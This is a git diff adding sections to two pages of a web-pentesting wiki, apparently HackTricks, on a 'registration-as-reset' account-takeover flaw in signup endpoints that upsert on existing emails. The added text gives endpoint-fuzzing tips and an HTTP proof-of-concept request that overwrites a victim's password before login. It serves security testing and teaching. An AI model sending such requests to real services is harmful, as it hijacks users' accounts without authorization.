diff --git a/src/pentesting-web/registration-vulnerabilities.md b/src/pentesting-web/registration-vulnerabilities.md
index 44a7aafee..8b36e86ce 100644
--- a/src/pentesting-web/registration-vulnerabilities.md
+++ b/src/pentesting-web/registration-vulnerabilities.md
@@ -178,8 +178,33 @@ JSON Web Token might be used to authenticate an user.
 hacking-jwt-json-web-tokens.md
 {{#endref}}
 
+## Registration-as-Reset (Upsert on Existing Email)
+
+Some signup handlers perform an upsert when the provided email already exists. If the endpoint accepts a minimal body with an email and password and does not enforce ownership verification, sending the victim's email will overwrite their password pre-auth.
+
+- Discovery: harvest endpoint names from bundled JS (or mobile app traffic), then fuzz base paths like /parents/application/v4/admin/FUZZ using ffuf/dirsearch.
+- Method hints: a GET returning messages like "Only POST request is allowed." often indicates the correct verb and that a JSON body is expected.
+- Minimal body observed in the wild:
+
+```json
+{"email":"victim@example.com","password":"New@12345"}
+```
+
+Example PoC:
+
+```http
+POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
+Host: www.target.tld
+Content-Type: application/json
+
+{"email":"victim@example.com","password":"New@12345"}
+```
+
+Impact: Full Account Takeover (ATO) without any reset token, OTP, or email verification.
+
 ## References
 
+- [How I Found a Critical Password Reset Bug (Registration upsert ATO)](https://s41n1k.medium.com/how-i-found-a-critical-password-reset-bug-in-the-bb-program-and-got-4-000-a22fffe285e1)
 - [https://salmonsec.com/cheatsheet/account_takeover](https://salmonsec.com/cheatsheet/account_takeover)
 
 {{#include ../banners/hacktricks-training.md}}
diff --git a/src/pentesting-web/reset-password.md b/src/pentesting-web/reset-password.md
index 363d27e32..92b94bbb8 100644
--- a/src/pentesting-web/reset-password.md
+++ b/src/pentesting-web/reset-password.md
@@ -287,10 +287,25 @@ Mitigations:
 - Never expose skipOldPwdCheck paths to unauthenticated users; enforce authentication for regular password changes and verify the old password.
 - Invalidate all active sessions and reset tokens after a password change.
 
+## Registration-as-Password-Reset (Upsert on Existing Email)
+
+Some applications implement the signup handler as an upsert. If the email already exists, the handler silently updates the user record instead of rejecting the request. When the registration endpoint accepts a minimal JSON body with an existing email and a new password, it effectively becomes a pre-auth password reset without any ownership verification allowing full account takeover.
+
+Pre-auth ATO PoC (overwriting an existing user's password):
+
+```http
+POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
+Host: www.target.tld
+Content-Type: application/json
+
+{"email":"victim@example.com","password":"New@12345"}
+```
+
+
 ## References
 
 - [https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token](https://anugrahsr.github.io/posts/10-Password-reset-flaws/#10-try-using-your-token)
 - [https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/](https://blog.sicuranext.com/vtenext-25-02-a-three-way-path-to-rce/)
+- [How I Found a Critical Password Reset Bug (Registration upsert ATO)](https://s41n1k.medium.com/how-i-found-a-critical-password-reset-bug-in-the-bb-program-and-got-4-000-a22fffe285e1)
 
 {{#include ../banners/hacktricks-training.md}}
-